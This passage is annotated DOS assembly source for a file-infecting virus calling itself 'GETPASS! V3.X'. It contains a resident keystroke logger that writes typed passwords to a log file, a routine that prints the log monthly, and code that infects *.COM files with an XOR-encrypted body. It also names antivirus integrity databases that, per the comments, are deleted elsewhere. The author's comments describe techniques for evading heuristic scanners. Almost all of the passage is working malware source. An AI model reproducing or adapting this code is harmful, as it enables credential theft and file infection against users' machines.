INC BX ;
MOV WORD PTR[CS:0100+KPTR],BX;
MOV AL,LF ;
JMP BACK ;
;-----------------------------------------------------------------------------
; OVER_2 -- tail of the resident keystroke hook (its entry is above this span).
; Reached when the captured key was a carriage return: appends CR,LF,LF to the
; keystroke buffer at CS:0100+KBUFF (BX = current fill index), flushes the
; buffer to the log file through WFILE, resets KFLAG and KPTR, and jumps to
; RESREGS (defined elsewhere) to restore registers and leave the handler.
; KPTR is NOT updated before the call: WFILE writes KPTR+3 bytes, i.e. the
; bytes logged before the CR plus the three appended here.
; NOTE(review): no bounds check on BX is visible in this span; KEYBUFF (below)
; is only 1Dh bytes, so the three appended bytes rely on a check made before
; this label -- confirm against the caller. KBUFF/KPTR/KFLAG are offsets
; defined outside this span.
;-----------------------------------------------------------------------------
OVER_2: MOV AL,CR ;AL = CR.
MOV BYTE PTR[CS:0100+KBUFF+BX],AL;KBUFF[BX] = CR.
INC BX ;Advance fill index.
MOV BYTE PTR[CS:0100+KBUFF+BX],LF;KBUFF[BX] = LF.
INC BX ;Advance fill index.
MOV BYTE PTR[CS:0100+KBUFF+BX],LF;KBUFF[BX] = second LF (WFILE writes KPTR+3 bytes).
CALL WFILE ;Append the terminated line to the log file.
MOV BYTE PTR[CS:0100+KFLAG],00h;Clear KFLAG (presumably "line in progress"; set elsewhere).
MOV WORD PTR[CS:0100+KPTR],00h;Empty the buffer: KPTR = 0.
JMP RESREGS ;Restore registers and return from the hook (label outside this span).
;-----------------------------------------------------------------------------
; WFILE -- append the keystroke buffer to the log file.
; In:  CS:0100+KPTR  = number of logged bytes before the CR (word)
;      CS:0100+KBUFF = buffer holding those bytes followed by CR,LF,LF
;      CS:0100+FN    = ASCIIZ log file name (defined elsewhere)
; Out: nothing; AX, BX, CX, DX and DS are preserved.
; Steps: open read/write (AX=3D02h), seek to end (AX=4202h), refuse to grow
; the log beyond 2000h bytes, write KPTR+3 bytes (AH=40h), close (AH=3Eh).
; The CS:0100 addressing assumes the resident image sits at offset 100h of
; its segment (COM layout); TIMER below additionally hardcodes segment 0044h.
; NOTE(review): the size cap branches to FAILURE, which skips FCLOSE, so every
; call made after the log reaches 2000h bytes leaks one DOS file handle.
; Only the low word (AX) of the DX:AX seek result is compared, and with a
; signed JGE, so a size of 8000h or more reads as negative and passes the cap.
; Neither the write nor the close result is checked.
;-----------------------------------------------------------------------------
WFILE: PUSH AX ;\
PUSH BX ;
PUSH DX ; Save registers.
PUSH CX ;
PUSH DS ;/
PUSH CS ;\ DS = CS: file name and buffer live in the code segment.
POP DS ;/
MOV AX,3D02h ;INT 21h/3Dh: open existing file, AL=02h = read/write.
MOV DX,OFFSET[CS:0100+FN] ;DS:DX -> ASCIIZ log file name.
INT 21h ;Call DOS.
JC FAILURE ;Open failed: nothing to close, restore registers and return.
XCHG BX,AX ;BX = file handle (returned in AX on success).
MOV AX,4202h ;INT 21h/42h: lseek, AL=02h = relative to end of file.
XOR CX,CX ;CX:DX = offset 0 -> position at EOF.
XOR DX,DX ;
INT 21h ;Returns new position in DX:AX, i.e. the current file size.
CMP AX,2000h ;Log already 2000h bytes or more? (low word only, signed)
JGE FAILURE ;Yes: stop logging. NOTE: the handle in BX is leaked here.
WRITE: MOV CX,CS:[0100+KPTR] ;CX = bytes logged before the CR...
ADD CX,03h ;...plus the CR,LF,LF appended by the caller.
MOV DX,OFFSET CS:[0100+KBUFF];DS:DX -> keystroke buffer.
MOV AH,40h ;INT 21h/40h: write CX bytes to handle BX.
INT 21h ;Call DOS (CF/AX not checked).
FCLOSE: MOV AH,3Eh ;INT 21h/3Eh: close handle BX.
INT 21h ;Call DOS.
FAILURE:POP DS ;\
POP DX ;
POP CX ; Restore registers.
POP BX ;
POP AX ;/
RET ;Return to caller.
;-----------------------------------------------------------------------------
;-----------------------------------------------------------------------------
; Resident data. NINT21 / NINT16 are two-word slots (offset, then segment)
; for the original INT 21h and INT 16h vectors; the code that fills and
; chains to them is outside this span. KEYBUFF is the 1Dh-byte keystroke
; buffer flushed by WFILE; LASTBYT marks the end of the resident image.
; NOTE(review): the hook above addresses the buffer as KBUFF, not KEYBUFF --
; presumably an offset EQU defined elsewhere; confirm the two coincide.
;-----------------------------------------------------------------------------
NINT21: DW 0 ;Original INT 21h vector: offset word...
DW 0 ;...and segment word.
NINT16: DW 0 ;Original INT 16h vector: offset word...
DW 0 ;...and segment word.
KEYBUFF DB 1dh DUP (?) ;Keystroke buffer (29 bytes; no bounds check visible in this span).
LASTBYT:DB 0 ;Last resident byte (end of the TSR image).
;-----------------------------------------------------------------------------
;-----------------------------------------------------------------------------
; ATTRIB -- read a target file's attributes, save them, and clear them.
; In:  word at [BP+NP] = pointer loaded into DX (NP is declared below as the
;      new DTA address; DS:DX must end up on the ASCIIZ file name). All data
;      is BP-relative because the code runs at a variable load offset (see
;      BEGIN1).
; Out: [BP+ATTR] = original attribute word from AX=4300h; the file then has
;      all attributes cleared (AX=4301h, CX=0) so read-only/hidden/system
;      files can be written. If clearing fails, EXIT (defined elsewhere) is
;      called. Clobbers AX, BX, CX, DX.
; NOTE(review): CF after the 4300h read is not checked, so on error whatever
; CX holds is stored and later written back by RATTRIB.
;-----------------------------------------------------------------------------
ATTRIB: MOV DX,WORD PTR[BP+OFFSET NP];DX = pointer stored at NP (file name).
MOV AX,4300h ;INT 21h/43h AL=0: get attributes into CX.
INT 21h ;Call DOS (CF not checked).
LEA BX,[BP+OFFSET ATTR] ;BX -> saved-attribute slot.
MOV [BX],CX ;Keep the original attributes for RATTRIB.
XOR CX,CX ;CX = 0: no read-only/hidden/system/archive bits.
MOV AX,4301h ;INT 21h/43h AL=1: set attributes from CX.
INT 21h ;Call DOS.
JNC OK ;Cleared: return.
CALL EXIT ;Could not strip attributes: abort (EXIT defined elsewhere).
OK: RET ;Return to caller.
;-----------------------------------------------------------------------------
;-----------------------------------------------------------------------------
; RATTRIB -- write the attributes saved by ATTRIB back onto NEWNAM.
; In:  [BP+NEWNAM] = ASCIIZ file name (per the original comment, the .TXT
;      rename; filled outside this span)
;      [BP+ATTR]   = attribute word stored by ATTRIB
; Out: none; CF from the DOS call is not examined. Clobbers AX, BX, CX, DX.
; Note the asymmetry: ATTRIB reads the name through NP, RATTRIB uses NEWNAM.
;-----------------------------------------------------------------------------
RATTRIB:LEA DX,[BP+OFFSET NEWNAM] ;DS:DX -> file name to restore (NEWNAM).
LEA BX,[BP+OFFSET ATTR] ;BX -> saved attribute word.
MOV CX,[BX] ;CX = original attributes.
MOV AX,4301h ;INT 21h/43h AL=1: set attributes from CX.
INT 21h ;Call DOS (CF not checked).
RET ;Return to caller.
;-----------------------------------------------------------------------------
;-----------------------------------------------------------------------------
; GODIR -- change the current directory.
; In:  ASCIIZ directory name at [BP+NEW_DTA+52] (filled outside this span).
; Out: none; CF from INT 21h/3Bh is not examined. Clobbers AH, DX.
;-----------------------------------------------------------------------------
GODIR: LEA DX,[BP+OFFSET NEW_DTA+52];DS:DX -> directory name stored at NEW_DTA+52.
MOV AH,3Bh ;INT 21h/3Bh: chdir.
INT 21h ;Call DOS (CF not checked).
RET ;Return to caller.
;-----------------------------------------------------------------------------
;-----------------------------------------------------------------------------
; RANDOM -- derive a small pseudo-random directory index.
; In:  BX = A, the number of directories in the path (set by the caller).
; Out: [BP+VAL_2] = value roughly in 1..A, derived from DL = hundredths of a
;      second returned by CHKTIME (INT 21h/2Ch). Clobbers AX, BX, CX, DX.
; Algorithm: CX = how many times BX can be subtracted from 100 before the
; result drops below 1 (about ceil(100/A)); then BX = how many times CL can
; be subtracted from DL before DL drops below 1 (about ceil(DL/CL)).
; NOTE(review): with BX = 0 (no directories) the first loop never ends,
; because SUB AX,BX leaves AX unchanged. Both compares are signed (JGE), so
; a wrap below zero is what actually stops a loop. The only entropy is the
; wall-clock hundredths digit; this is not a cryptographic generator.
;-----------------------------------------------------------------------------
RANDOM: CALL CHKTIME ;DL = hundredths of a second, guaranteed non-zero.
MOV CX,0 ;CX = iteration counter for loop 1.
MOV AX,100d ;AX = 100, repeatedly reduced by A.
OK_19: INC CX ;CX++
SUB AX,BX ;AX -= A (A = directory count from caller).
CMP AX,01d ;Keep going while AX >= 1 (signed).
JGE OK_19 ;CX ends near ceil(100/A); never exits if A = 0.
XOR BX,BX ;BX = iteration counter for loop 2.
OK_20: INC BX ;BX++
SUB DL,CL ;DL -= CL.
CMP DL,01d ;Keep going while DL >= 1 (signed byte compare).
JGE OK_20 ;BX ends near ceil(DL/CL), roughly 1..A.
MOV BYTE PTR[BP+OFFSET VAL_2],BL;Store the result for the directory switch.
RET ;Return to caller.
;-----------------------------------------------------------------------------
;-----------------------------------------------------------------------------
; BEGIN1 -- compute the load delta into BP (delta-offset technique).
; PUSH SP / POP BX leaves BX = SP, which points at the return address pushed
; by the CALL BEGIN1; BP = that return address - 10Fh. BP is therefore 0 when
; the code sits at its original offset (the CALL returns to 10Fh) and equals
; the displacement when the code has been appended to a host. Every
; BP+OFFSET reference in this file depends on this value.
; Out: BP; clobbers BX.
; NOTE(review): PUSH SP pushes the pre-decrement value only on the 80286 and
; later; on an 8086/8088 it pushes the decremented SP, so BX would not point
; at the return address and BP would be wrong.
;-----------------------------------------------------------------------------
BEGIN1: PUSH SP ;\ BX = SP (286+ semantics) -> points at the return address.
POP BX ;/
MOV BP,WORD PTR[BX] ;BP = return address of this CALL.
SUB BP,10Fh ;Minus the return address at the original location (10Fh) = delta.
RET ;Return to caller.
;-----------------------------------------------------------------------------
;-----------------------------------------------------------------------------
; NEWINT -- replacement INT 24h (critical error) handler.
; Returns AL = 3, the INT 24h "Fail" action code, so DOS fails the offending
; call instead of showing the Abort/Retry/Fail prompt (e.g. on a
; write-protected disk). The vector swap itself is done elsewhere (OLDINT).
;-----------------------------------------------------------------------------
NEWINT: MOV AL,03h ;AL = 3: "Fail" the DOS call silently.
IRET ;Return from the critical-error interrupt.
;-----------------------------------------------------------------------------
;-----------------------------------------------------------------------------
; TIMER -- on the 1st of the month, dump the password log to the printer.
; Uses the byte at 0044:0100 as an "already printed" flag; the segment 0044h
; is hardcoded (the author's comment calls it the resident segment). If the
; flag is 1, or INT 21h/2Ah reports a day of month (DL) other than 1, returns
; immediately. Otherwise opens PRN (AX=3D01h, write) and FNAME (AX=3D00h,
; read; FNAME defined elsewhere), copies the file to the printer one byte at
; a time through OUTPUT, closes the handle left in BX and sets the flag.
; Clobbers AX, BX, CX, DX, SI, DI.
; NOTE(review): neither open checks CF, so on failure an error code in AX is
; used as a handle. Only the log-file handle is closed (BX still equals SI at
; READY); the PRN handle in DI is never closed. The read loop stops only on
; AX = 0 (EOF); should DOS return an error code in AX instead, the loop never
; terminates.
;-----------------------------------------------------------------------------
TIMER: PUSH DS ;Save caller's DS.
MOV AX,0044h ;\ Hardcoded: flag byte lives at segment 0044h.
MOV DS,AX ;/
CMP BYTE PTR[DS:0100],01h ;"Already printed" flag set?
POP DS ;Restore DS before branching.
JE NOPRINT ;Yes: print only once.
MOV AH,2Ah ;INT 21h/2Ah: get date (DL = day of month).
INT 21h ;Call DOS.
CMP DL,01h ;Only on the 1st of the month.
JNE NOPRINT ;Otherwise do nothing.
MOV AX,3D01h ;INT 21h/3Dh AL=1: open 'PRN' for writing.
LEA DX,[BP+OFFSET PRINT] ;DS:DX -> "PRN",0.
INT 21h ;Call DOS (CF not checked).
MOV DI,AX ;DI = printer handle (or an error code on failure).
MOV AX,3D00h ;INT 21h/3Dh AL=0: open the password log read-only.
LEA DX,[BP+OFFSET FNAME] ;DS:DX -> log file name (FNAME defined elsewhere).
INT 21h ;Call DOS (CF not checked).
MOV SI,AX ;SI = log file handle.
GOPRINT:MOV AH,3Fh ;INT 21h/3Fh: read from handle.
MOV BX,SI ;BX = log file handle.
MOV CX,01h ;One byte at a time.
LEA DX,[BP+OFFSET OUTPUT] ;Into the OUTPUT byte.
INT 21h ;AX = bytes read.
CMP AL,0 ;Zero bytes = EOF (a read error is not distinguished).
JE READY ;Done copying.
MOV AH,40h ;INT 21h/40h: write to handle.
MOV BX,DI ;BX = printer handle.
MOV CX,01h ;One byte.
LEA DX,[BP+OFFSET OUTPUT] ;From the OUTPUT byte.
INT 21h ;Call DOS (CF not checked).
JMP GOPRINT ;Next byte.
READY: MOV AH,3Eh ;INT 21h/3Eh: close handle BX (= SI, the log file).
INT 21h ;The PRN handle in DI is left open.
PUSH DS ;Save DS again.
MOV AX,0044h ;Same hardcoded segment as above.
mov DS,AX ;DS = 0044h.
MOV BYTE PTR[DS:0100],01h ;Set the "already printed" flag.
POP DS ;Restore DS.
NOPRINT:RET ;Return to caller.
;-----------------------------------------------------------------------------
;-----------------------------------------------------------------------------
; INSTSR2 -- copy the INFECT routine to NEW_DTA+100h and hook INT D0h to it.
; Copies TSR2LEN bytes (TSR2LEN defined elsewhere) from DS:[BP+INFECT] to
; ES:[BP+NEW_DTA+100h] with REP MOVSB (DF assumed clear, DS and ES assumed
; set by the caller), then AX=25D0h points the INT D0h vector at DS:DX, i.e.
; at the copy. INFECT ends with IRET, so it is invoked as a software
; interrupt; D0h is not a DOS-defined vector, presumably chosen as unused.
; Clobbers AX, CX, DX, SI, DI.
;-----------------------------------------------------------------------------
INSTSR2:LEA DI,[BP+OFFSET NEW_DTA+0100h];ES:DI -> destination, 100h past NEW_DTA.
LEA SI,[BP+OFFSET INFECT] ;DS:SI -> INFECT routine.
MOV CX,TSR2LEN ;Byte count (TSR2LEN defined elsewhere).
REP MOVSB ;Copy the routine.
MOV AX,25D0h ;INT 21h/25h: set interrupt vector, AL=D0h.
LEA DX,[BP+OFFSET NEW_DTA+0100h];DS:DX -> new handler (the copy just made).
INT 21h ;Call DOS.
RET ;Return to caller.
;-----------------------------------------------------------------------------
;-----------------------------------------------------------------------------
; Working data, all addressed BP-relative. 'PRN' is the printer device opened
; by TIMER; 'PATH=' the environment key located by search code outside this
; span; '*.COM' the victim search mask; '.TXT' the suffix used for NEWNAM.
; CHKLIST.MS, CHKLIST.CPS and ANTI-VIR.DAT are the integrity databases of
; MSAV, Central Point Anti-Virus and TBAV; the original comment says they are
; deleted (the deletion code is outside this span) so modified files are not
; reported. NEWJMP / ORIGNL / DEXIT are 3-byte entry-point patches:
; E9 xx xx = near JMP, CD 20 90 = INT 20h + NOP.
; ATTR is two bytes read and written as a word by ATTRIB/RATTRIB.
;-----------------------------------------------------------------------------
PRINT DB 'PRN',0 ;Printer device name (TIMER).
PATH DB 'PATH=' ;Environment key searched for (code elsewhere).
SPEC DB '*.COM',0 ;Victim search mask.
TXT DB '.TXT',0 ;Suffix for the renamed copy (NEWNAM).
OUTPUT DB 0 ;One-byte staging area for TIMER's copy loop.
TXTPOI DW 0 ;Pointer into the specification being built.
MARK1 DB 0 ;Infection marker (checked elsewhere).
VAL_2 DB 0 ;Pseudo-random directory index from RANDOM.
OLDRV DB 0 ;Saved drive code.
BYTES DB 'TBDRVX',0 ;Name prefix, presumably files to skip (TBAV driver) -- confirm.
COMMND DB 'COMM',0 ;Name prefix, presumably COMMAND.COM to skip -- confirm.
MICRO DB 'CHKLIST.MS',0 ;\ Integrity-checker databases deleted by code
CENTRAL DB 'CHKLIST.CPS',0 ; | outside this span (MSAV, CPAV, TBAV).
TBAV DB 'ANTI-VIR.DAT',0 ;/
VIRNAME DB 'GETPASS! V3.X',0 ;Self-identification string.
BEGIN2 DW 0 ;
NWJMP1 DB 0EBh,0 ;EB xx = short JMP opcode + displacement.
FLAGT DB 0 ;
OLD_DTA DW 0 ;Saved DTA address.
HANDLE DW 0 ;File handle (victim).
TIME DB 2 DUP (?) ;Victim file time (for restoring timestamps).
DATE DB 2 DUP (?) ;Victim file date.
ATTR DB 1 DUP (?),0 ;Saved attribute word (ATTRIB/RATTRIB).
NEWJMP DB 0E9h,0,0 ;E9 xx xx = near JMP patched over the host entry.
ORIGNL DB 0CDh,020h,090h ;Original 3 host bytes (default INT 20h; NOP).
DEXIT DB 0CDh,020h,090h ;Dummy exit: INT 20h; NOP.
NEWNAM DB 0Dh DUP (?) ;New file name, 8.3 + NUL = 13 bytes.
OLDINT DW 0 ;Saved INT 24h vector (offset word only).
NP DW ? ;New DTA address (read by ATTRIB).
;-----------------------------------------------------------------------------
;-----------------------------------------------------------------------------
; INFECT -- write the encrypted virus body to an open file (INT D0h handler).
; In:  BX = file handle positioned where the body goes
;      DX = encryption key (DL is the key byte used by ENCRYPT)
;      BP = load delta (BEGIN1)
; Installed at NEW_DTA+100h by INSTSR2 and entered via INT D0h, hence IRET.
; Runs ENCRYPT over the code (CRYPTLEN bytes from CSTART), writes VIRLEN
; bytes starting at VSTART with AH=40h, then runs ENCRYPT again with the same
; key to undo the XOR in memory. VSTART/VIRLEN are defined elsewhere.
; BX and DX are preserved (three pushes / three pops); ENCRYPT clobbers
; BX, CX, DX, which is why both are saved around it.
; NOTE(review): the write's CF/AX is not checked; a short or failed write
; leaves a truncated body in the target.
;-----------------------------------------------------------------------------
INFECT: PUSH BX ;Save handle (restored last).
PUSH DX ;Save key (ENCRYPT advances DL/DH).
PUSH BX ;Save handle again (ENCRYPT clobbers BX).
CALL ENCRYPT ;XOR-scramble the code in place.
POP BX ;BX = handle for the write.
LEA DX,[BP+OFFSET VSTART] ;DS:DX -> start of the body to write.
MOV CX,VIRLEN ;Byte count (VIRLEN defined elsewhere).
MOV AH,40h ;INT 21h/40h: write to handle BX.
INT 21h ;Call DOS (CF not checked).
POP DX ;DX = original key again.
CALL ENCRYPT ;Same key stream -> XOR restores the plaintext.
POP BX ;BX = handle, as on entry.
DUMMY: IRET ;Entered via INT D0h, so return with IRET.
;-----------------------------------------------------------------------------
;-----------------------------------------------------------------------------
; CREATE -- create the password log file with a banner, if it does not exist.
; AH=5Bh (create new file; sets CF if the name already exists) on
; [BP+FNAME] with CX=0 (normal attributes). On success writes INTRO bytes of
; banner text from INAME with AH=40h. FNAME and INTRO are defined elsewhere.
; Clobbers AX, BX, CX, DX.
; NOTE(review): the new handle in BX is never closed here (no AH=3Eh), and
; any create error -- not only "already exists" -- takes the EXISTS path
; silently. INAME and LBIT are data emitted in the code stream after the RET.
;-----------------------------------------------------------------------------
CREATE: MOV AH,5Bh ;INT 21h/5Bh: create new file (fails if it exists).
LEA DX,[BP+OFFSET FNAME] ;DS:DX -> log file name (FNAME defined elsewhere).
MOV CX,0 ;Normal attributes.
INT 21h ;Call DOS.
JC EXISTS ;CF: exists (or any other error) -> skip the banner.
XCHG AX,BX ;BX = new file handle (left open).
MOV CX,INTRO ;Banner length (INTRO defined elsewhere).
LEA DX,[BP+OFFSET INAME] ;DS:DX -> banner text.
MOV AH,40h ;INT 21h/40h: write to handle BX.
INT 21h ;Call DOS (CF not checked).
EXISTS: RET ;Return to caller.
; Banner written to a fresh log file (data, not executed).
INAME: DB 'You are now looking at the name/passwords of '
DB 'your network! ',CR,LF
DB 'Greetings, ThE wEiRd GeNiUs.',CR,LF
DB 'Check your MSD.INI once in a while!',CR,LF,CR,LF
LBIT: DB 0 ;Byte after the banner (purpose not visible in this span).
;-----------------------------------------------------------------------------
;Comment: From here the code remains UN-encrypted.
;-----------------------------------------------------------------------------
;-----------------------------------------------------------------------------
; CHKTIME -- read the system time, retrying until the hundredths are non-zero.
; INT 21h/2Ch returns CH:CL = hours:minutes, DH:DL = seconds:hundredths.
; Out: DL != 0 (RANDOM uses it as a loop decrement, so it must not be zero).
; Clobbers AX, CX, DX. Spins while DL is 0.
;-----------------------------------------------------------------------------
CHKTIME:MOV AH,2Ch ;INT 21h/2Ch: get system time.
INT 21h ;Call DOS.
CMP DL,0 ;Hundredths of a second zero?
JE CHKTIME ;Yes: read again.
RET ;Return to caller.
;-----------------------------------------------------------------------------
;-----------------------------------------------------------------------------
; CHKDOS -- get the DOS version number.
; Out: AL = major, AH = minor version (INT 21h/30h); the call also fills BX
;      and CX (OEM/serial fields). The caller interprets the result.
;-----------------------------------------------------------------------------
CHKDOS: MOV AH,30h ;INT 21h/30h: get DOS version.
INT 21h ;Call DOS; AX = version.
RET ;Return to caller.
;-----------------------------------------------------------------------------
VAL_1 DB 00h ;Encryption key byte. Must directly precede ENCRYP: it is read as [NEXTL-4]. Zero = body is stored unencrypted.
;-----------------------------------------------------------------------------
;Encrypting the virus code is no longer the most important thing to do since
;some of the anti-viral software can decrypt and trace the virus code in a
;simulated way. The en/de-cryption routine is almost the only piece of
;code that stays readable and if it is not a polymorphic virus this code
;always stays the same. The only way we can misguide a heuristic
;scanner is to 'tell' it that we are a normal, respectable program. By first
;performing a set of 'normal' instructions we mislead the scanner until it
;stops tracing the program. The result is that the en/decryption routine is
;not discovered. Since there are no other suspicious instructions in the code
;we remain under cover. This is why I used a very simple encryption method.
;-----------------------------------------------------------------------------
;-----------------------------------------------------------------------------
; ENCRYP / ENCRYPT -- rolling-XOR cipher over the virus body (self-inverse).
; ENCRYP (decrypt-on-startup path): CALL NEXTL / POP BX yields BX = NEXTL =
; ENCRYP+3, so BX-4 = ENCRYP-1 = VAL_1, the key byte stored directly before
; this routine. DL = key; BX -= LENGTH (defined elsewhere) -> start of the
; encrypted code. Key 0 means "not encrypted" and returns immediately.
; ENCRYPT (called by INFECT): In: DL = key, BP = load delta; BX is set to
; CSTART (defined elsewhere). Both paths fall into DECRYPT.
; DECRYPT: for CRYPTLEN bytes: [BX] ^= DL; DL -= DH; DH -= 2Eh; with DH
; initially equal to DL. XOR is its own inverse and the key stream depends
; only on the starting DL, so running the loop twice restores the plaintext.
; Out: none. Clobbers BX, CX, DX (DL/DH end at their final stream values).
; NOTE: this is obfuscation, not confidentiality -- the key byte sits in the
; clear beside the routine and the stream is a fixed affine recurrence; the
; author's comment above states the evasion intent.
;-----------------------------------------------------------------------------
ENCRYP: CALL NEXTL ;\ BX = address of NEXTL (return address).
NEXTL: POP BX ;/
SUB BX,04 ;BX = NEXTL-4 = VAL_1, the key byte.
MOV DL,[BX] ;DL = key.
SUB BX,LENGTH ;BX = start of the encrypted code (LENGTH defined elsewhere).
CMP DL,0 ;Key zero?
JE NOTENC ;Yes: body is not encrypted, nothing to do.
JMP DECRYPT ;Decrypt in place.
ENCRYPT:LEA BX,[BP+OFFSET CSTART] ;Entry from INFECT: BX = CSTART, DL = key.
DECRYPT:MOV DH,DL ;DH = running delta, seeded with the key.
MOV CX,CRYPTLEN ;Byte count (CRYPTLEN defined elsewhere).
X_LOOP: XOR [BX],DL ;[BX] ^= current key byte.
SUB DL,DH ;Advance the key stream: DL -= DH...
SUB DH,02Eh ;...and DH -= 2Eh.
INC BX ;Next byte.
LOOP X_LOOP ;Repeat CRYPTLEN times.
NOTENC: RET ;Return to caller.
;-----------------------------------------------------------------------------
;-----------------------------------------------------------------------------
; BUFFER: 64 bytes of directory info. NEW_DTA is only a label at the end of
; the assembled image: the DTA copy, the directory name at NEW_DTA+52 used
; by GODIR, and the INFECT copy placed at NEW_DTA+100h by INSTSR2 all live
; in memory past the end of the code, with no storage reserved here.
;-----------------------------------------------------------------------------
BUFFER: DB 64 DUP (?) ;Directory info scratch area.
NEW_DTA: ;Start of the DTA copy (beyond the assembled image).
;-----------------------------------------------------------------------------
CODE ENDS
END START
;=============================================================================